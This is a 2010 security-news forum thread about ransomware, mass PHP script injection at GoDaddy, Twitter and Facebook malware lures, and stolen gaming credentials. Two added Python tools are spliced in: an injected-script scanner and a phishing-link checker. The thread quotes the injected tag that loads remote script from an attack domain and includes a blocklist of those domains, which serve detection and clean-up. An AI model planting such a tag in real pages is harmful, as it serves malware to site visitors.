Windows “activation” ransomware
FYI...
- http://sunbeltblog.blogspot.com/2010...ansomware.html
May 17, 2010 - "... a piece of ransomware that locks up Windows until you enter your credit card data. First it claims you are running a pirated version of Windows and they need your billing details. “... but your credit card will NOT be charged”... Once you enter your credit card details, it will “activate” your “pirated” OS and make it legitimate. Basically, the Trojan locks your system. The only thing you can do is complete the "activation". You can choose to "activate windows" or "do it later". If you choose to do it later, your machine reboots... Your credit card information is shipped off to a network of fast-flux bots standing by ready to receive it..."
(Screenshots available at the URL above.)
:mad:
GoDaddy attacks continue...
FYI... 'suggest BLOCK THEM ALL...
- http://community.websense.com/blogs/...ain_2100_.aspx
19 May 2010 - "... The domain kdjkfjskdfjlskdjf .com is directly related to the ongoing attacks and still appears on injected sites. Another set of domains is losotrana .com, holasionweb .com, indesignstudioinfo .com and zettapetta .com. Checking the number of hits... over this past weekend revealed more than 23,000 infected pages with this kind of attack, and it's still growing. The malicious code is injected by the attackers into PHP files on the server..."
(More detail at the Websense URL above.)
- http://www.malwaredomains.com/wordpress/?p=972
May 18, 2010 - Please block losotrana . com ASAP. Source...
GoDaddy attacks continue...
- http://blog.sucuri.net/2010/05/conti...t-godaddy.html
May 17, 2010 - "And it is still not over. Remember the code we found last week* that was hacking all the PHP files at GoDaddy? It is still happening, but now using the losotrana .com domain ( http: //losotrana .com/js.php ). This is the script that will show up on your site if you get hacked:
<script src="http: //losotrana .com/js.php"></script>
Everything else is the same as the previous attacks that infected thousands of sites. They are hacking the sites using this tool:
http://blog.sucuri.net/2010/05/found...alware-at.html
You can clean up using this script:
http://blog.sucuri.net/2010/05/simpl...or-latest.html
All the sites so far hosted at GoDaddy... GoDaddy admitted they have a problem, but it looks like they were not able to fix it yet... this Losotrana .com site is hosted at the same domain as holasionweb .com used on the previous attack..."
* http://blog.sucuri.net/2010/05/found...alware-at.html
May 12, 2010
___
- http://google.com/safebrowsing/diagn...dfjlskdjf.com/
"... last time Google visited this site was on 2010-05-15, and the last time suspicious content was found on this site was on 2010-05-15. Malicious software includes 6 scripting exploit(s)..."
- http://google.com/safebrowsing/diagn...losotrana.com/
"... last time Google visited this site was on 2010-05-17, and the last time suspicious content was found on this site was on 2010-05-17. Malicious software includes 6 scripting exploit(s)..."
- http://google.com/safebrowsing/diagn...lasionweb.com/
"... last time Google visited this site was on 2010-05-18, and the last time suspicious content was found on this site was on 2010-05-17. Malicious software includes 108 scripting exploit(s), 1 trojan(s)..."
- http://google.com/safebrowsing/diagn...tudioinfo.com/
"... last time Google visited this site was on 2010-05-18, and the last time suspicious content was found on this site was on 2010-05-14. Malicious software includes 11 scripting exploit(s)..."
- http://google.com/safebrowsing/diagn...ettapetta.com/
"... The last time Google visited this site was on 2010-05-14, and the last time suspicious content was found on this site was on 2010-05-14. Malicious software includes 2 scripting exploit(s)..."
:fear::mad:
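The Websense and Sucuri posts above describe the infection as a single external script tag injected into PHP files, and point to a separate clean-up script. The following is an added example, not code from either post or from GoDaddy/Sucuri: a small Python scanner that walks a web root, reports every external script tag whose host is on a blocklist built from the domains the posts name, and can strip those tags. The sample files it scans are constructed here to stand in for a hacked site; the blocklist and regular expression are assumptions of this example, not part of the original reports.

```python
import re
import tempfile
from pathlib import Path

# Domains named in the Websense and Sucuri posts quoted above. The posts defang
# them with a space before ".com"; the space is dropped here so the scanner can
# match them in live HTML. Extend the set as new reports name further hosts.
BLOCKED_DOMAINS = {
    "kdjkfjskdfjlskdjf.com",
    "losotrana.com",
    "holasionweb.com",
    "indesignstudioinfo.com",
    "zettapetta.com",
}

# Matches an external <script src=...></script> tag and captures its host.
# Protocol-relative (//host/...) and quote-less src values are accepted too.
SCRIPT_TAG_RE = re.compile(
    r"""<script\b[^>]*\bsrc\s*=\s*["']?(?:https?:)?//([^/"'\s>]+)[^>]*>\s*</script>""",
    re.IGNORECASE,
)


def is_blocked(host):
    """True when host is a listed domain or a subdomain of one."""
    host = host.lower().split(":")[0]  # drop any :port suffix
    return host in BLOCKED_DOMAINS or any(host.endswith("." + d) for d in BLOCKED_DOMAINS)


def injected_script_hosts(text):
    """Return (host, tag) for every external script tag in text whose host is blocked."""
    return [(m.group(1).lower(), m.group(0))
            for m in SCRIPT_TAG_RE.finditer(text) if is_blocked(m.group(1))]


def clean_text(text):
    """Strip blocked script tags from text. Returns (cleaned_text, number_removed)."""
    removed = 0

    def drop_if_blocked(m):
        nonlocal removed
        if is_blocked(m.group(1)):
            removed += 1
            return ""
        return m.group(0)

    return SCRIPT_TAG_RE.sub(drop_if_blocked, text), removed


def scan_tree(root, patterns=("*.php", "*.html", "*.js")):
    """Yield (path, hits) for every matching file under root that carries a blocked tag."""
    root = Path(root)
    for pattern in patterns:
        for path in sorted(root.rglob(pattern)):
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            hits = injected_script_hosts(text)
            if hits:
                yield path, hits


# Constructed sample files standing in for a hacked site: the injected tag is the
# one quoted in the Sucuri post, the cdn.example.org script is benign.
SAMPLE_FILES = {
    "index.php": '<?php include "header.php"; ?>\n<h1>Welcome</h1>\n'
                 '<script src="http://losotrana.com/js.php"></script>\n',
    "header.php": '<script src="https://cdn.example.org/app.js"></script>\n',
    "about.html": '<p>About us</p>\n'
                  '<script src="//static.holasionweb.com/a.js"></script>\n',
}


def demo():
    """Write the sample tree to a temp dir, scan it, and return {filename: [hosts]}."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLE_FILES.items():
            Path(tmp, name).write_text(body)
        return {path.name: [h for h, _ in hits] for path, hits in scan_tree(tmp)}


if __name__ == "__main__":
    for name, hosts in demo().items():
        print(f"{name}: injected script from {', '.join(hosts)}")
```

Run it against a real document root by calling `scan_tree("/path/to/htdocs")`; review the hits before applying `clean_text`, and treat a hit as a sign the server itself was compromised, since the posts note the code was written into PHP files on the host rather than delivered through the browser.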
Twitter attack - in progress...
FYI...
- http://www.f-secure.com/weblog/archives/00001954.html
May 20, 2010 11:37 GMT - "... another malware run underway on Twitter. A fairly large pool of fake accounts are sending out messages with popular hashtags and the text "haha this is the funniest video ive ever seen"... People see these messages when they look for trending topics in Twitter. The shortlinks in the Tweets point to a page under pc-tv .tv, which uses a Java exploit to drop a keylogger / banking trojan combo to your system..."
:mad:
AutoRun worms still alive
FYI...
AutoRun worms still alive...
- http://blog.trendmicro.com/new-autor...ze-action-key/
May 18, 2010 - " ... malware proponents continue to find new techniques to proliferate their malicious creations despite workarounds that users employ to prevent them from automatically running on their systems... simply disabling AutoPlay just does not cut it anymore. Extra steps such as monitoring where external devices are used and updating all security software to combat potential threats should also be taken. For business users, security policies regarding data access and the use of external devices should be employed and enforced across the organization. Additional information about malware-protecting removable devices can be found in 'How to Maximize the Malware Protection of Your Removable Drives'*".
* http://blog.trendmicro.com/how-to-ma...ovable-drives/
:fear::fear:
Beware the trader bearing free gifts...
FYI...
- http://gizmodo.com/5544593
May 21, 2010 - "... lecturing in the importance of protecting PCs..."
- http://preview.tinyurl.com/2bjdjau
22 May 2010 - "... over 99 different malicious applications were used in this and last weekend's attacks."
:fear::fear:
44 million stolen gaming credentials uncovered
FYI...
- http://www.symantec.com/connect/blog...ials-uncovered
May 26, 2010 - "... We recently analyzed a new sample submitted to Symantec and came across a server hosting the credentials of 44 million stolen gaming accounts. What was interesting about this threat wasn’t just the sheer number of stolen accounts, but that the accounts were being validated by a Trojan distributed to compromised computers. Symantec detects this threat as Trojan.Loginck*. This particular database server we uncovered seems very much to be the heart of the operation—part of a distributed password checker aimed at Chinese gaming websites. The stolen login credentials are not just from particular online games, but also include user login accounts associated with sites that host a variety of online games. In both cases the accounts contained in the database have been obtained from other sources, most likely using malware with information-stealing capabilities, such as Infostealer.Gampass **. So, picture this: you are a bad guy and have created or purchased a botnet. You have targeted online gaming websites and now have 44 million sets of gaming credentials at your disposal... The database in question currently holds approximately 17GB of flat file data. The particular sample we analysed attempted to validate passwords for Wayi Entertainment, but there are credentials for at least 18 gaming websites in the database... if you are in possession of a gaming account from one of the websites listed above, an update of your password would not go amiss..."
* http://www.symantec.com/business/sec...052013-2257-99
** http://www.symantec.com/security_res...111201-3853-99
:fear:
Credit union fraud via phish for U.S. Servicemen and Vets
FYI...
- http://www.symantec.com/connect/blog...veterans-guard
May 25, 2010 - "... a phishing site was observed to be spoofing a credit union that provides financial services to members of the U.S. Defense Department and their family members. The defense forces covered by the credit union include the Army, Marine Corps, Navy, and Air Force. The services are provided to their customers even after they retire from the armed forces or join some other organization. Further, those who have joined the credit union can have the membership services extend to their family members. The brand has now grown to serve millions of customers across the U.S. The phishing site states that the customer’s login has been locked because of several failed login attempts. The page further states that the customer needs to fill in a form with certain sensitive information to unlock the login. The sensitive information includes social security number, credit card details, date of birth, mother’s maiden name, and details of the account’s joint owner. The page also includes a fake CAPTCHA that accepts data irrespective of the number entered. When the sensitive information is entered, the phishing site states that the customer’s password is unlocked for logging in. The page is then redirected to the legitimate site... The phishing site was hosted on an IP-based domain (IP-based URLs look like this - http ://255.255.255.255/) based on servers in Taiwan. Variants of the phishing URL have been utilized to spoof other brands as well. Internet users are advised to follow best practices to avoid phishing attacks. Here are some basic tips for avoiding online scams:
• Do not click on suspicious links in email messages.
• Check the URL of the website and make sure that it belongs to the brand.
• Type the domain name of your brand’s website directly into your browser’s address bar rather than following any link.
• Frequently update your security software..."
:fear:
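The Symantec post above ends with the tip to check that a link's URL belongs to the brand, and notes that this phishing page sat on an IP-based URL of the form http://255.255.255.255/. As an added example, not code from Symantec or the original post, the Python below pulls the links out of a message and applies that tip mechanically: it flags hosts that are IP literals, hosts that hide behind a `user@` prefix, and hosts that merely contain the brand name inside someone else's domain. The credit union's domain (`examplecu.example`) and the sample email are placeholders constructed for this example.

```python
import ipaddress
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"""https?://[^\s<>"']+""", re.IGNORECASE)


def extract_links(text):
    """Pull every http(s) URL out of a message body, trimming trailing punctuation."""
    return [u.rstrip(".,;:!?)") for u in URL_RE.findall(text)]


def link_problems(url, brand_domain):
    """Return the reasons a link fails the "make sure the URL belongs to the brand" check.

    An empty list means the host is brand_domain or one of its subdomains.
    brand_domain is the registrable domain of the real site, e.g. "examplecu.example".
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    brand = brand_domain.lower()
    reasons = []
    if not host:
        return ["no host in URL"]
    # http://brand@evil.example/ puts the brand before '@'; the real host is after it.
    if parts.username is not None:
        reasons.append("credentials in URL hide the real host")
    # The post's "IP-based domain" case: http://255.255.255.255/ has no name at all.
    try:
        ipaddress.ip_address(host)
        reasons.append("host is an IP address, not a domain name")
        return reasons
    except ValueError:
        pass
    if host == brand or host.endswith("." + brand):
        return reasons
    reasons.append(f"host {host!r} is not {brand!r} or a subdomain of it")
    # brand.example.attacker.example or brand-secure.example: the brand label
    # appears, but the registrable domain belongs to someone else.
    if brand.split(".")[0] in host:
        reasons.append("brand name embedded in a look-alike host")
    return reasons


def triage_message(text, brand_domain):
    """Map each link in the message to its list of problems (empty list = passes)."""
    return {url: link_problems(url, brand_domain) for url in extract_links(text)}


# Constructed sample mimicking the "login locked" lure described in the post; the
# credit union's real domain is the placeholder examplecu.example, all hosts fictitious.
SAMPLE_EMAIL = """\
Your login has been locked after several failed attempts.
Unlock it here: http://255.255.255.255/unlock.php
Or verify at https://examplecu.example.account-verify.example/login
Our real site: https://online.examplecu.example/
"""

if __name__ == "__main__":
    for url, problems in triage_message(SAMPLE_EMAIL, "examplecu.example").items():
        print(url, "->", "OK" if not problems else "; ".join(problems))
```

The check is deliberately strict about the registrable domain rather than the visible brand name, which is the part of the tip people get wrong: a host that starts with the brand is not the brand's host. Obfuscated numeric forms such as decimal or hexadecimal IPs are not covered here and would need an extra normalisation step.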
boingboing .com spews drive-by-download malware...
FYI...
boingboing .com spews malware...
- http://news.cnet.com/8301-27080_3-20005969-245.html
May 26, 2010 - "... Armorize scanned the Alexa top-ranked 200,000 Web sites and found that 1 percent were infected with malware that can be used in drive-by downloads. One site Armorize found to be used as a vehicle for delivering malware was boingboing .com, which attackers were likely using in the hopes of reaching a broad audience by taking advantage of the proximity of the domain to the popular blog at Boingboing.net..."
* http://blog.armorize.com/2010/05/bew...m-malware.html
:fear::mad:
Facebook attacked again...
FYI...
- http://community.websense.com/blogs/...-facebook.aspx
28 May 2010 09:11 PM - "... For the third weekend in a row users on Facebook are bombarded with messages on their walls talking about Distracting Beach Babes, Sexiest Video Ever or this latest attack which supposedly is the "Most Hilarious Video ever"... This attack is different from previous weekends as not only do the attackers try to steal your Facebook credentials, what happens after that depends on which country you connect from. Once you click on the link to view the video you are taken to a fake Facebook login page where you are tricked into entering your credentials. The login page looks like the real thing except of course if you look at the address bar you can see that you're not on facebook.com. But users can easily be tricked into thinking that they temporarily were logged out of Facebook and to continue they have to log in..."
(Screenshots available at the URL above.)
- http://blog.webroot.com/2010/05/28/f...e-by-download/
May 28, 2010
- http://www.sophos.com/blogs/gc/g/201...acebook-users/
May 31, 2010 - "Hundreds of thousands of Facebook users have fallen for a social-engineering trick which allowed a clickjacking worm to spread quickly over Facebook..."
:fear::mad: